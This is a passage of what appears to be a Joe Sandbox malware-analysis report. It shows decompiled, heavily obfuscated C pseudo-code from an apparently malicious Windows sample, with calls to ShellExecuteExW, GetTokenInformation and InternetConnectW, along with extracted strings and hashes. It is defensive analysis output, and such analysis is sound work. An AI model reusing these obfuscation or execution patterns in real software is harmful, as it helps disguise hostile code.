                                                          • String ID: AddInUtil.exe$B5d$api-ms-win-core-rtlsupport-l1-1-0.dll$lprmonui.dll$tsbyuv.dll$wlanmsm.dll$;.$Nqt
                                                          • API String ID: 190572456-4062036808
                                                          • Opcode ID: 79cf4af2a589e2ff93dc5e92c8df364dabac33ad5654eb12c0d69cd6902ea72c
                                                          • Instruction ID: 23b041c6d9b549e1c4f6cf04645bc91d1e6679a4b44fee2a4a4f772b40168ae2
                                                          • Opcode Fuzzy Hash: 79cf4af2a589e2ff93dc5e92c8df364dabac33ad5654eb12c0d69cd6902ea72c
                                                          • Instruction Fuzzy Hash: DC41D0B9A147469FCB00DF74EC94AED3BB0EF39310B04416ED881D7762E639050AEB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E004B22A1(void* __eax, void* __ecx, void* __edx, void* __esi) {
                                                          				long _t39;
                                                          				long _t41;
                                                          				char* _t42;
                                                          				long _t44;
                                                          				long _t46;
                                                          				char* _t62;
                                                          				intOrPtr _t71;
                                                          				void* _t80;
                                                          				void* _t105;
                                                          				void* _t107;
                                                          
                                                          				_t104 = __esi;
                                                          				_t80 = __ecx;
                                                          				_t39 =  *(_t107 - 8);
                                                          				if( *((intOrPtr*)(_t107 - 0x3c)) == 0xffffffff) {
                                                          					 *0x5081d6 =  *0x5081d6 - 0x85cb;
                                                          					 *(_t107 - 8) = _t39;
                                                          					if(_t39 < 0x2057) {
                                                          						if(_t62 != 0x39) {
                                                          							_t62 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
                                                          						}
                                                          					}
                                                          					_t82 = 0x674c;
                                                          					 *0x5081a6 = 0x674c;
                                                          					_t98 = 0x871324;
                                                          					_t41 = GetLastError();
                                                          					 *0x5081f4 = 0x871324;
                                                          					 *(_t107 - 8) = _t41;
                                                          					_t42 = "wmi.dll";
                                                          					if(_t62 == 0x25f343) {
                                                          						_t62 = "LookupPrivilegeValueA";
                                                          						_t82 = 0xe16f;
                                                          						_t98 =  *0x5081fa; // 0x8a34
                                                          					}
                                                          					 *0x50afe1 = _t42;
                                                          					_t105 = _t104 + 0xc800;
                                                          					 *0x50afe5 = 0;
                                                          					_t44 =  *(_t107 - 8);
                                                          					 *(_t107 - 8) = _t44;
                                                          					 *(_t107 - 8) = _t44;
                                                          					_t46 =  *(_t107 - 8);
                                                          					 *(_t107 - 0x44) = _t46;
                                                          					if((_t98 - 0x0000009d & 0x000000a5) == 0) {
                                                          						 *0x509dc3 =  *0x509dc3 - _t105;
                                                          					}
                                                          					 *(_t107 - 8) = _t46;
                                                          					E004B009D(_t46, 0, _t82, _t46, _t46, _t46);
                                                          					 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)(_t107 - 0x10)) + 0x36e765;
                                                          					 *((intOrPtr*)(_t107 - 0xc)) =  *((intOrPtr*)(_t107 - 0xc)) + 0x22a07e;
                                                          					 *((intOrPtr*)(_t107 - 0x10)) = 0x36e765;
                                                          					 *0x508136 =  *0x508136 + _t82;
                                                          					_push(0x4b2ed4);
                                                          					goto __ecx;
                                                          				}
                                                          				_t71 =  *0x50afe6; // -97
                                                          				 *(_t107 - 8) = _t39;
                                                          				E004AD34D(_t39 + _t39, _t71, __ecx, __edx, 0, __esi);
                                                          				_push(0);
                                                          				E004A8400(_t80);
                                                          				 *((intOrPtr*)(_t107 - 0xc)) =  *((intOrPtr*)(_t107 - 0x14));
                                                          				 *((intOrPtr*)(_t107 - 0x14)) = 0;
                                                          				 *((intOrPtr*)(_t107 - 0x10)) = 0x370155;
                                                          				_push(0);
                                                          				_push(0x4b2333);
                                                          				_push(L004A9E48);
                                                          				return "credssp.dll";
                                                          			}

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: 9$EtwEventWriteStartScenario$LookupPrivilegeValueA$api-ms-win-core-rtlsupport-l1-1-0.dll$credssp.dll$ddrawex.dll$e6$wmi.dll
                                                          • API String ID: 1452528299-3063859001
                                                          • Opcode ID: aa220abc887c320e64c723956fdb153e27a2e262982ddbea6a7548dfd2a478bb
                                                          • Instruction ID: a6e478682443e68e8968b33daed8ebd62e7cb5a9751b673da70cfb5c82a60409
                                                          • Opcode Fuzzy Hash: aa220abc887c320e64c723956fdb153e27a2e262982ddbea6a7548dfd2a478bb
                                                          • Instruction Fuzzy Hash: E7418074E4030AAFCB00DFB9D885ADDBBB0FF28320F44816A9855E7785D6B80A46DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00476259
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: WindowsCodecs.dll$ddrawex.dll$nshhttp.dll$w&)$Nqt$;
                                                          • API String ID: 190572456-1639350716
                                                          • Opcode ID: f472174720b0d8767453a1aa6d74500204f3a14c1a5673d4f146e5cc38dd5398
                                                          • Instruction ID: 18d2f73edac6bd089ddb15175c90a4063f18d71f38de32ca7bc446af12e68f98
                                                          • Opcode Fuzzy Hash: f472174720b0d8767453a1aa6d74500204f3a14c1a5673d4f146e5cc38dd5398
                                                          • Instruction Fuzzy Hash: B891D2B5E447469FCB01DFB8EC94ADD7FB1FB39310B0440AAC88497362E2750949EB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004E4127(unsigned int __ecx, void* __edx, void* __edi, void* __esi) {
                                                          				struct _SHELLEXECUTEINFOW* _t65;
                                                          				struct _SHELLEXECUTEINFOW* _t71;
                                                          				signed int _t73;
                                                          				struct _SHELLEXECUTEINFOW* _t75;
                                                          				struct _SHELLEXECUTEINFOW* _t78;
                                                          				int _t79;
                                                          				struct _SHELLEXECUTEINFOW* _t88;
                                                          				signed int _t107;
                                                          				intOrPtr _t129;
                                                          				unsigned short _t146;
                                                          				short _t147;
                                                          				intOrPtr _t148;
                                                          				signed int _t149;
                                                          				void* _t159;
                                                          				short _t160;
                                                          				signed int _t161;
                                                          				signed short _t162;
                                                          				void* _t164;
                                                          				signed int _t168;
                                                          				signed short _t170;
                                                          				void* _t173;
                                                          
                                                          				_t164 = __edi;
                                                          				_t159 = __edx;
                                                          				_t65 =  *(_t173 - 8);
                                                          				_t146 = __ecx >> __ecx;
                                                          				 *(_t173 - 8) = _t65;
                                                          				if(_t65 >= 0x19bfc5) {
                                                          					_t146 =  *0x50812e; // 0x6c03
                                                          					 *0x50afde =  *0x50afde - _t146;
                                                          					 *0x50817e =  *0x50817e + _t146;
                                                          				}
                                                          				_t147 = _t146 + _t146;
                                                          				 *((intOrPtr*)(_t173 - 0x64)) = 1;
                                                          				 *0x508156 = _t147;
                                                          				 *0x508170 = _t147;
                                                          				_t148 =  *0x5081a4; // 0x81e6
                                                          				_t160 = _t159 - 0x8e3a;
                                                          				 *0x5081f0 = _t160;
                                                          				_t161 = _t160 + _t160;
                                                          				 *(_t173 - 0xc) = 0x1d7f42;
                                                          				 *(_t173 - 8) = _t173 - 0x80;
                                                          				 *(_t173 - 0xc) = 0xc3;
                                                          				 *((intOrPtr*)(_t173 - 0x1c)) = _t148;
                                                          				if(_t148 >= _t148) {
                                                          					 *((intOrPtr*)(_t173 - 0x24)) =  *((intOrPtr*)(_t173 - 0x24)) + _t148 + 0x71d2;
                                                          					 *0x5081c8 = _t161;
                                                          					_t161 = _t161 - 0x979566;
                                                          				}
                                                          				_t71 =  *(_t173 - 8);
                                                          				 *0x50805a =  *0x50805a - _t71;
                                                          				 *(_t173 - 8) = _t71;
                                                          				_t73 =  *(_t173 - 8);
                                                          				 *((intOrPtr*)(_t173 - 0x10)) = 0x122a5b + _t71;
                                                          				 *(_t173 - 8) = _t73;
                                                          				 *(_t173 - 0xc) =  !_t73;
                                                          				_t75 =  *(_t173 - 8);
                                                          				 *(_t173 - 0x84) = _t75;
                                                          				_t149 =  *0x5081a2; // 0xea53
                                                          				 *0x5081ec = _t161;
                                                          				 *0x508208 = _t161;
                                                          				 *(_t173 - 8) = _t75;
                                                          				 *0x508082 =  *0x508082 - 0x1cfc1a;
                                                          				_t78 =  *(_t173 - 8);
                                                          				_t107 =  *(_t173 - 0x14);
                                                          				if(_t107 < _t107) {
                                                          					if(_t107 > _t149) {
                                                          						L9:
                                                          						_t161 = _t161;
                                                          						 *0x50afe1 = _t78;
                                                          					} else {
                                                          						_t149 = 0x6f29;
                                                          						if(0x6f29 < 0x6f29 || (_t161 & 0x00000089) < 0) {
                                                          							_t161 = _t161 + 0x8e203d;
                                                          							goto L9;
                                                          						}
                                                          					}
                                                          				}
                                                          				_t168 = 0x50a7e1;
                                                          				_t79 = ShellExecuteExW( *(_t173 - 0x84));
                                                          				if((_t161 & 0x0097123e) != 0 || 0xa020 <= 0) {
                                                          					_t168 = _t168 + _t168 - 0xd7bf;
                                                          					if(_t164 < 0) {
                                                          						 *(_t173 - 8) =  *(_t173 - 8) + _t79;
                                                          						 *0x50afdc =  *0x50afdc - 0x2df03c;
                                                          					}
                                                          					_t149 = _t161;
                                                          					_t161 =  *0x5081cc; // 0x48e8
                                                          				}
                                                          				 *0x50afe3 =  *0x50afe3 - _t79;
                                                          				_t170 = _t168 & 0x00c26faa;
                                                          				 *0x50841b = _t79;
                                                          				if(_t79 == 1) {
                                                          					 *0x50afd8 =  *0x50afd8 - _t79;
                                                          					 *0x50afd9 =  *0x50afd9 - _t79;
                                                          					_t129 =  *((intOrPtr*)(_t173 - 0x1c));
                                                          					 *(_t173 - 8) = _t79;
                                                          					 *((intOrPtr*)(_t173 - 0x10)) = _t129;
                                                          					 *((intOrPtr*)(_t173 - 0x10)) = _t129;
                                                          					 *(_t173 - 0x18) = "psxdllsvr.dll";
                                                          					_t88 =  *(_t173 - 8);
                                                          					 *(_t173 - 8) = _t88;
                                                          					if(_t88 < 0x15503e) {
                                                          						 *(_t173 - 0x14) =  !0x319947;
                                                          					}
                                                          					_t79 =  *(_t173 - 8);
                                                          					_t149 =  !0x5eb9;
                                                          					 *((intOrPtr*)(_t173 - 0x88)) = 1;
                                                          				}
                                                          				 *0x5081dc =  *0x5081dc + _t161;
                                                          				_t162 = _t161 + _t161;
                                                          				if((_t162 & 0x0000a71a) >= 0) {
                                                          					L22:
                                                          					 *0x50afe6 = _t79;
                                                          					 *0x50afd9 =  *0x50afd9 - _t79;
                                                          					if(_t79 <= 0x29ff) {
                                                          						 *(_t173 - 0x14) =  *(_t173 - 0x14) - 0x3ae18d;
                                                          					}
                                                          					 *0x5081aa = _t162;
                                                          				} else {
                                                          					if((_t170 & 0x0000b6df) >= 0) {
                                                          						goto L22;
                                                          					}
                                                          				}
                                                          				return  *((intOrPtr*)(_t173 - 0x88));
                                                          			}

                                                          APIs
                                                          • ShellExecuteExW.SHELL32(?), ref: 004E4298
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: EtwEventWriteStartScenario$charmap.exe$ddrawex.dll$de7$psxdllsvr.dll$xmllite.dll
                                                          • API String ID: 587946157-549880681
                                                          • Opcode ID: 4befaf33527f7da0f86a870cad30398446eb246e4f8d55ca61f114bea9562803
                                                          • Instruction ID: 05f30665b6eaf5ff5092fd22524fba29bfdfeb6f75f6fcd323570ad4567ef2d4
                                                          • Opcode Fuzzy Hash: 4befaf33527f7da0f86a870cad30398446eb246e4f8d55ca61f114bea9562803
                                                          • Instruction Fuzzy Hash: D5816E79E0474A8BCB00DFBAD8846DDBBB1FB39310F04416AD984E7752E6780A89DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 26%
                                                          			E004AB1FF(void* __ebx, intOrPtr __ecx, signed char __edx, void* __eflags) {
                                                          				char* _t52;
                                                          				char* _t70;
                                                          				intOrPtr* _t73;
                                                          				char* _t74;
                                                          				void* _t100;
                                                          				intOrPtr _t122;
                                                          				signed int _t123;
                                                          				signed char _t126;
                                                          				signed char _t139;
                                                          				signed int _t143;
                                                          				void* _t148;
                                                          				signed short _t150;
                                                          				void* _t153;
                                                          
                                                          				_t139 = __edx;
                                                          				_t122 = __ecx;
                                                          				L00466DA9(__ebx, _t148, 0, 0, 1);
                                                          				 *0x508222 = _t139;
                                                          				_t52 =  *(_t153 - 8);
                                                          				 *0x50848b = _t52;
                                                          				 *(_t153 - 8) = _t52;
                                                          				 *((intOrPtr*)(_t153 - 0x18)) =  *((intOrPtr*)(_t153 - 0x18)) + 0x428616;
                                                          				 *((intOrPtr*)(_t153 - 0x18)) = _t122;
                                                          				_t123 =  *0x508160; // 0x6f15
                                                          				 *((intOrPtr*)(_t153 - 0x14)) = 0x355170;
                                                          				_t126 = (_t123 | 0x000062df) + (_t123 | 0x000062df) - 0x8268;
                                                          				_t63 = GetTokenInformation( *(_t153 - 0x48), ??, ??, ??, ??);
                                                          				if(_t63 == 0) {
                                                          					 *(_t153 - 8) = _t63;
                                                          					 *((intOrPtr*)(_t153 - 0x10)) = 0x3b039e;
                                                          					_push( *(_t153 - 0x48));
                                                          					_t70 =  *(_t153 - 8);
                                                          					if(_t126 > _t126) {
                                                          					}
                                                          					 *(_t153 - 8) = _t70;
                                                          					_push(0x4abca4);
                                                          					_push( *0x508af7);
                                                          					return  *(_t153 - 8);
                                                          				}
                                                          				 *0x5081ec = _t139;
                                                          				if((_t139 & 0x000000a8) != 0 || 0 > 0) {
                                                          					 *0x5086d7 =  *0x5086d7 - _t148;
                                                          					_t148 = _t148 - _t63;
                                                          					if(_t63 <= 0x1834) {
                                                          						 *(_t153 - 0xc) = _t63;
                                                          						 *0x508104 =  *0x508104 + 0x3910ed;
                                                          						_t126 = 0x71;
                                                          						 *0x50afde =  *0x50afde + 0x71;
                                                          					}
                                                          				}
                                                          				_t143 = 0x50afdf;
                                                          				_t73 =  *((intOrPtr*)(_t153 - 0x4c));
                                                          				_t150 = 0 >> _t126;
                                                          				if(_t148 == 0) {
                                                          					L9:
                                                          					_t126 =  *0x50815e; // 0x67a3
                                                          					 *0x5081aa = _t143;
                                                          					_t143 = 0xffffffffffffff5d;
                                                          					 *0x50afe1 =  *0x50afe1 + _t73;
                                                          					 *0x50afe1 = _t73;
                                                          					if((_t150 & 0x0000b7fc) < 0) {
                                                          						 *0x50abec =  *0x50abec + _t148;
                                                          					}
                                                          					goto L11;
                                                          				} else {
                                                          					_t148 = _t148 + 0xd5927d;
                                                          					 *0x50afe6 = _t73;
                                                          					if(_t73 == 0x222e) {
                                                          						L11:
                                                          						 *0x50afd8 =  *0x50afd8 - _t73;
                                                          						 *0x50afd8 =  *0x50afd8 + _t73;
                                                          						_t74 =  *_t73;
                                                          						 *(_t153 - 0x60) = _t74;
                                                          						if(_t74 != 0) {
                                                          							L14:
                                                          							_t126 = _t126;
                                                          							if((_t143 & 0x0076525a) >= 0) {
                                                          								L17:
                                                          								_t100 =  *(_t153 - 8) - 0x265b;
                                                          								if(_t74 != 0x2e3e) {
                                                          									L21:
                                                          									_t143 = _t143 + _t143;
                                                          									L22:
                                                          									_push( *(_t153 - 0x60));
                                                          									_t139 = _t143 + 0x9a9d85 - 0xa0;
                                                          									 *(_t153 - 8) = _t74;
                                                          									_t63 = "wlanmsm.dll";
                                                          									 *(_t153 - 0xc) = "wlanmsm.dll";
                                                          									_push(1);
                                                          									_push(0xaf82);
                                                          									_push(0xaf82);
                                                          									_push(0x4ab45e);
                                                          									_t126 = E004A9AAF;
                                                          									goto __ecx;
                                                          								}
                                                          								 *0x5080b0 =  *0x5080b0 + _t100;
                                                          								if( *((intOrPtr*)(_t153 - 0x14)) >  *((intOrPtr*)(_t153 - 0x14))) {
                                                          									goto L22;
                                                          								}
                                                          								L19:
                                                          								L20:
                                                          								_t143 = 0;
                                                          								goto L21;
                                                          							}
                                                          							_t143 = 0x93b2;
                                                          							 *0x509a67 =  *0x509a67 + 0x93b2;
                                                          							 *0x50a8e6 =  *0x50a8e6;
                                                          							if(_t148 <= 0) {
                                                          								goto L20;
                                                          							}
                                                          							goto L17;
                                                          						}
                                                          						if(_t74 < 0x1352bb) {
                                                          							goto L19;
                                                          						}
                                                          						_t126 = 0x6463;
                                                          						 *0x50afde =  *0x50afde + 0x6463;
                                                          						goto L14;
                                                          					}
                                                          					 *0x50afdc =  *0x50afdc - "BuildExplicitAccessWithNameA" - 0x3af0ab;
                                                          					goto L9;
                                                          				}
                                                          			}

















                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000000,00000001), ref: 004AB27A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: InformationToken
                                                          • String ID: BuildExplicitAccessWithNameA$CIRCoInst.dll$CNHMWL.dll$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$pQ5$wlanmsm.dll
                                                          • API String ID: 4114910276-3280036276
                                                          • Opcode ID: 11571fe8b1124ec8e0e7ac6c838ed621b31e540b9efd0e18b0fcb4633e4a5fcf
                                                          • Instruction ID: 574ccd0fc51804da34fd6601f3b5d2d4c09dcd1ff0de0441aefb97794f1e5afd
                                                          • Opcode Fuzzy Hash: 11571fe8b1124ec8e0e7ac6c838ed621b31e540b9efd0e18b0fcb4633e4a5fcf
                                                          • Instruction Fuzzy Hash: EB71CE79E0034A9FCB00DFB8E894ADE7FB1EB3A320F04416AD944A7352E7750949DB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetConnectW.WININET(?,?), ref: 004D6588
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ConnectInternet
                                                          • String ID: BuildExplicitAccessWithNameA$Ix-$a4)$api-ms-win-core-rtlsupport-l1-1-0.dll$charmap.exe$X7
                                                          • API String ID: 3050416762-2050661817
                                                          • Opcode ID: fd8bfbb3770e200e410d9aa409e67f534f47b368f1badf5f42fa958cd50dbfeb
                                                          • Instruction ID: f6d3bfee123f6b6b6ff354e4308ca077beec78c3871fcc64ac10e413510b132f
                                                          • Opcode Fuzzy Hash: fd8bfbb3770e200e410d9aa409e67f534f47b368f1badf5f42fa958cd50dbfeb
                                                          • Instruction Fuzzy Hash: 537105B9A447429FC701CF78EC64BDD3BB1EB35320B08406BD884D7362EA78090AE756
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 004ACB68
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: AllocConsole$GetTickCount64$PenIMC_v0400.dll$RtlEthernetStringToAddressW$WindowsCodecs.dll$wlanmsm.dll
                                                          • API String ID: 3964851224-3425434924
                                                          • Opcode ID: e8df3d6847dcc4f7dc5b558a232467e5ff7a6f5940d03f83cf452a77211a09bb
                                                          • Instruction ID: aaa7daa4403868453afcfa7e88fd3a5e3c37339016c6c8e83c49b83e8a94ae5b
                                                          • Opcode Fuzzy Hash: e8df3d6847dcc4f7dc5b558a232467e5ff7a6f5940d03f83cf452a77211a09bb
                                                          • Instruction Fuzzy Hash: B951B074E4430A9BDB00DFA9E8D06DE7BB1FF39320B44417A9989E7352E7380946DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E00493920() {
                                                          				signed char _t37;
                                                          				signed char _t38;
                                                          				signed char _t43;
                                                          				signed char _t47;
                                                          				signed char _t49;
                                                          				signed char _t52;
                                                          				_Unknown_base(*)()* _t53;
                                                          				void* _t62;
                                                          				void* _t66;
                                                          				intOrPtr _t76;
                                                          				void* _t88;
                                                          				short _t90;
                                                          				signed char _t95;
                                                          				signed char _t97;
                                                          				signed short _t100;
                                                          				short _t104;
                                                          				signed int _t117;
                                                          				unsigned short _t118;
                                                          				signed int _t119;
                                                          				void* _t120;
                                                          
                                                          				_t63 = _t62 + 1;
                                                          				 *((intOrPtr*)(_t120 - 0xc)) = _t62 + 1;
                                                          				_t90 =  *((intOrPtr*)(_t120 - 0x10)) - 0x6802;
                                                          				_t37 =  *(_t120 - 8);
                                                          				if(_t90 < _t90) {
                                                          					if((_t100 & 0x00008f6f) != 0) {
                                                          						 *0x50822a = _t100;
                                                          					}
                                                          					_t63 = 0xc2;
                                                          				}
                                                          				 *0x50afe3 = _t37;
                                                          				_t38 = E005007C9(_t63 + 0xea, _t117);
                                                          				_t118 = _t117 ^ 0x0000c7ab;
                                                          				 *0x50afe6 = _t38;
                                                          				 *(_t120 - 8) = _t38;
                                                          				if(_t38 == 0x23) {
                                                          					L9:
                                                          					 *0x508537 = 0xfc;
                                                          					_t66 = 0x2e98a5;
                                                          					 *0x50afda =  *0x50afda + 0x2e98a5;
                                                          					goto L10;
                                                          				} else {
                                                          					_t88 =  *((intOrPtr*)(_t120 - 0xc)) + 0x3bcd4a;
                                                          					 *0x50afdc =  *0x50afdc - _t88;
                                                          					_t66 = _t88 + _t88;
                                                          					if(_t90 <= _t90) {
                                                          						_t90 = 0x6a19;
                                                          						_t100 =  *0x5081e2; // 0x81c6
                                                          						 *0x50afe0 =  *0x50afe0 - _t100;
                                                          						E00508230 = E00508230 + _t118;
                                                          						_t118 = _t118 + _t118;
                                                          						_t38 =  *0x50afe3; // -68
                                                          					}
                                                          					if(_t118 < 0) {
                                                          						L10:
                                                          						 *0x508164 = _t90;
                                                          						_t43 =  *(_t120 - 8);
                                                          						 *(_t120 - 0x2c) = _t43;
                                                          						 *0x5081b4 = _t90;
                                                          						 *(_t120 - 8) = _t43;
                                                          						 *((intOrPtr*)(_t120 - 0xc)) = _t66 - 1;
                                                          						_t47 =  *(_t120 - 8);
                                                          						if(_t90 - 0x5d77 == _t90 - 0x5d77) {
                                                          							 *0x5081bc = _t100;
                                                          							 *0x5081d6 = _t100;
                                                          						}
                                                          						 *(_t120 - 8) = _t47;
                                                          						_t49 =  *(_t120 - 8);
                                                          						_push( *(_t120 - 0x2c));
                                                          						 *(_t120 - 8) = _t49;
                                                          						if(_t49 >= 0x23) {
                                                          							 *0x5080f2 =  *0x5080f2 + 0x3b4a22;
                                                          						}
                                                          						_t104 =  *0x5081e0; // 0x189d
                                                          						_t52 =  *(_t120 - 8);
                                                          						_push( *0x508457);
                                                          						_t95 =  *0x508166; // 0x0
                                                          						 *0x5081b4 = _t104;
                                                          						_t119 = _t118 >> _t95;
                                                          						if((_t52 & 0x000000bd) >= 0) {
                                                          						}
                                                          						 *0x508012 =  *0x508012 - _t52;
                                                          						_t53 = GetProcAddress(??, ??);
                                                          						if((_t119 & 0x00a1195f) == 0) {
                                                          							 *0x508286 =  *0x508286 + _t119;
                                                          							 *0x50afe3 = _t53;
                                                          						}
                                                          						 *(_t120 - 8) = _t53;
                                                          						 *0x50811a =  *0x50811a + _t95;
                                                          						_t97 = _t95 + _t95 + 0x7597;
                                                          						_t76 =  *0x508acf; // 0x500000
                                                          						E00465B85(_t119, _t97, 1);
                                                          						 *0x50818c = _t97;
                                                          						 *((intOrPtr*)(_t120 - 0xc)) = (_t76 - 0x3f72 >> _t97) + (_t76 - 0x3f72 >> _t97);
                                                          						E00465B85(_t119, 1, 1);
                                                          						_push(1);
                                                          						_push(0);
                                                          						_push(0x493b8b);
                                                          						goto __ebx;
                                                          					} else {
                                                          						 *0x50afe5 = _t38;
                                                          						goto L9;
                                                          					}
                                                          				}
                                                          			}
























                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00493AE8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: "J;$CIRCoInst.dll$CNHMWL.dll$Display.dll$EtwEventWriteStartScenario$Nqt
                                                          • API String ID: 190572456-3345187357
                                                          • Opcode ID: 05d4fa36f585e38a718f42d75413a85554affebdf692b6dd38bb3edc5e04fbd3
                                                          • Instruction ID: 84a109258601607af15e7e47908b363d4205c8e2a8075759f42827cbd6f40324
                                                          • Opcode Fuzzy Hash: 05d4fa36f585e38a718f42d75413a85554affebdf692b6dd38bb3edc5e04fbd3
                                                          • Instruction Fuzzy Hash: DD510379A107469FCB00DFB8E894ADD7FB1EB3A320F04407AD885AB362E7750549DB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E004B255C() {
                                                          				char* _t27;
                                                          				long _t28;
                                                          				long _t30;
                                                          				char* _t31;
                                                          				long _t33;
                                                          				long _t35;
                                                          				void* _t41;
                                                          				char* _t43;
                                                          				void* _t60;
                                                          				short _t71;
                                                          				void* _t85;
                                                          				signed int _t87;
                                                          				signed int _t88;
                                                          				void* _t89;
                                                          				void* _t91;
                                                          
                                                          				_t27 =  *(_t91 - 8);
                                                          				if(_t41 - 0x34 <= _t41 - 0x34) {
                                                          					_t71 = _t60 + 0x64;
                                                          					 *0x50817a = _t71;
                                                          					 *0x50821a = 0x9258;
                                                          					_t87 = _t87 - 0xa69c00;
                                                          					 *0x50afe5 = _t27;
                                                          					if(_t85 <= 0 || 0x448b == 0x448b) {
                                                          						 *0x508132 = _t71;
                                                          					}
                                                          				}
                                                          				 *0x50afe1 = _t27;
                                                          				_t88 = _t87 ^ 0x000000c6;
                                                          				_t43 =  *0x50afe3; // -68
                                                          				_push(0);
                                                          				_pop(_t28);
                                                          				 *0x5081d6 =  *0x5081d6 - 0x85cb;
                                                          				 *(_t91 - 8) = _t28;
                                                          				if(_t28 < 0x2057) {
                                                          					if(_t43 != 0x39) {
                                                          						_t43 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
                                                          					}
                                                          				}
                                                          				_t65 = 0x674c;
                                                          				 *0x5081a6 = 0x674c;
                                                          				_t80 = 0x871324;
                                                          				_t30 = GetLastError();
                                                          				 *0x5081f4 = 0x871324;
                                                          				 *(_t91 - 8) = _t30;
                                                          				_t31 = "wmi.dll";
                                                          				if(_t43 == 0x25f343) {
                                                          					_t43 = "LookupPrivilegeValueA";
                                                          					_t65 = 0xe16f;
                                                          					_t80 =  *0x5081fa; // 0x8a34
                                                          				}
                                                          				 *0x50afe1 = _t31;
                                                          				_t89 = _t88 + 0xc800;
                                                          				 *0x50afe5 = 0;
                                                          				_t33 =  *(_t91 - 8);
                                                          				 *(_t91 - 8) = _t33;
                                                          				 *(_t91 - 8) = _t33;
                                                          				_t35 =  *(_t91 - 8);
                                                          				 *(_t91 - 0x44) = _t35;
                                                          				if((_t80 - 0x0000009d & 0x000000a5) == 0) {
                                                          					 *0x509dc3 =  *0x509dc3 - _t89;
                                                          				}
                                                          				 *(_t91 - 8) = _t35;
                                                          				E004B009D(_t35, 0, _t65, _t35, _t35, _t35);
                                                          				 *((intOrPtr*)(_t91 - 0x10)) =  *((intOrPtr*)(_t91 - 0x10)) + 0x36e765;
                                                          				 *((intOrPtr*)(_t91 - 0xc)) =  *((intOrPtr*)(_t91 - 0xc)) + 0x22a07e;
                                                          				 *((intOrPtr*)(_t91 - 0x10)) = 0x36e765;
                                                          				 *0x508136 =  *0x508136 + _t65;
                                                          				_push(0x4b2ed4);
                                                          				goto __ecx;
                                                          			}



















                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: 9$EtwEventWriteStartScenario$LookupPrivilegeValueA$RtlEthernetStringToAddressW$api-ms-win-core-rtlsupport-l1-1-0.dll$e6$wmi.dll
                                                          • API String ID: 1452528299-2583003684
                                                          • Opcode ID: 29e28c72218af6bd50cd4ee3c14c756a1f3d675d095c57346bb940944524a375
                                                          • Instruction ID: 07d118654e3ba631fc6ad79ad9d69e432f57647faf4cd6562eda770001ed9fb5
                                                          • Opcode Fuzzy Hash: 29e28c72218af6bd50cd4ee3c14c756a1f3d675d095c57346bb940944524a375
                                                          • Instruction Fuzzy Hash: EE412174D04306AFDB00DFB8D998AEE7BB1FF38310F04422AC88597756E2790A46D759
                                                          Uniqueness

